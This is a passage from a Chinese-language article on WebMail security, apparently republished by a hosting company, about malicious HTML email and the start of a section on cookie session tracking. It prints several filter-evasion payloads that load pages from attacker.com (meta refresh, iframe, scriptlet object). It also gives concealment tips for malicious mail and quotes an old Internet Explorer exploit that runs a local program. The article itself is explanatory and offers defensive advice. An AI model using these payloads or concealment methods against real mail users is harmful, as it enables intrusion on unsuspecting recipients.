|
除了可以在html郵件中直接嵌入腳本程序外,攻擊者還可以設(shè)計一些html代碼�,在用戶打開html郵件時,不知不覺引入另一個html文件����,而此文件中正含有惡性代碼�����,這樣不僅能直接繞過WebMail系統(tǒng)對腳本程序的過濾����,而且還能有效避開提供了防毒服務(wù)的郵件系統(tǒng)對惡性代碼的查殺��。下面是幾個調(diào)用html文件的例子:
(1)Refresh到另一個頁面:
以下為引用的內(nèi)容:
<body>
<metahttp-equiv="refresh"content="1�����;URL=http://www.attacker.com/another.htm">
</body>
(2)Iframe引入另一個頁面:
以下為引用的內(nèi)容:
<body>
<iframesrc="http://www.attacker.com/import.htm"frameborder="0"></iframe>
</body>
(3)scriptlet引入另一個頁面:
以下為引用的內(nèi)容:
<body>
<objecttype="text/x-scriptlet"data="http://www.attacker.com/import.htm"></object>
</body>
攻擊者還可以采取如下方法����,使帶有惡性代碼的html郵件具有更大的隱蔽性:
(1)配合郵件欺騙技術(shù),使用戶不會懷疑收到的郵件����,并且攻擊者也能隱藏自己的行蹤。
(2)把html郵件設(shè)計成看起來像txt郵件�。
(3)有時可以把html郵件中的惡性代碼放在一個隱藏的層里面,表面上看不出任何變化��。
針對惡性腳本程序的影響,對用戶常見的建議辦法是提高瀏覽器的安全級別����,如禁用ActiveX、禁用腳本等����,但這并不是一個很好的辦法,因為這樣會影響到用戶對其他正常html頁面的瀏覽�����。即使瀏覽器達到了最高級別�,依然對某些惡性代碼無濟于事,下面是位以色列安全專家發(fā)現(xiàn)的漏洞����,能讓Windows系統(tǒng)自動執(zhí)行任何本地程序,即使InternetExplorer已經(jīng)禁止了ActiveX和腳本程序:
以下為引用的內(nèi)容:
<spandatasrc="#oExec"datafld="exploit"dataformatas="html"></span>
<xmlid="oExec">
<security>
<exploit>
<![CDATA[
<objectid="oFile"classid="clsid:11111111-1111-1111-1111-
111111111111"codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
面對惡性html郵件�,WebMail系統(tǒng)和用戶似乎都沒有很好的解決辦法,雖然許多WebMail系統(tǒng)已經(jīng)能夠過濾掉html郵件中的很多惡性代碼����,不過令人遺憾的是��,要想徹底過濾掉惡性代碼并不是一件容易的事情,攻擊者總能利用WebMail系統(tǒng)過濾機制和瀏覽器的漏洞找到辦法繞過種種過濾�,WebMail系統(tǒng)所能做的就是發(fā)現(xiàn)一個漏洞補一個漏洞。
為了減少乃至避免惡性html郵件的影響��,在打開html郵件之前���,WebMail系統(tǒng)有必要提醒用戶這是一個html郵件�,如果能提供讓用戶以文本方式瀏覽html郵件的功能����,則是最好不過。在打開不明郵件之前��,用戶更要小心謹慎�����,最好把html郵件“目標另存為”到本地硬盤上再打開來看��,如果能先查看html郵件源代碼�,則是最好不過。
另外需要特別提醒用戶注意的是���,雖然一些電子郵件系統(tǒng)會在WebMail系統(tǒng)上對html郵件中的惡性代碼進行過濾�����,但在pop3服務(wù)器上并不會進行過濾�,所以,如果是通過郵件客戶端收取郵件��,仍然要謹防惡性html郵件的危害����。
五、Cookie會話攻擊
當用戶以自已的郵箱帳戶和密碼登錄進WebMail以后����,如果再讓用戶對每一步操作都輸入密碼加以確認就會讓人不甚其煩。所以WebMail系統(tǒng)有必要進行用戶會話跟蹤����,WebMail系統(tǒng)用到的會話跟蹤技術(shù)主要有兩種:cookie會話跟蹤和URL會話跟蹤。
Cookie是web服務(wù)器保存在用戶瀏覽器上的文本信息��,可以包含用戶名����、特殊ID、訪問次數(shù)等任何信息���,通常此信息用于標識訪問同一web服務(wù)器上的不同用戶�����,在瀏覽器每次訪問同一web服務(wù)器時會發(fā)送過去���,用于跟蹤特定客戶端或瀏覽器與web服務(wù)器進行交互的狀態(tài)。
Cookie的類型有兩種:持久型和臨時型���。持久型cookie以文本形式存儲在硬盤上��,由瀏覽器存取��。使用了持久型cookie會話跟蹤的WebMail系統(tǒng)有hotmail��、yahoo電郵(可選)等�����。臨時型cookie也稱為會話cookie�����,存儲在內(nèi)存中���,僅為當前瀏覽器的對話存儲����,關(guān)閉當前瀏覽器后會立即消失�,ASP、PHP4等開發(fā)程序中用到的session對象就會產(chǎn)生臨時型cookie����。使用了臨時型cookie會話跟蹤的WebMail系統(tǒng)有FM365、億郵等����。
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商��!15年品質(zhì)保障�����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
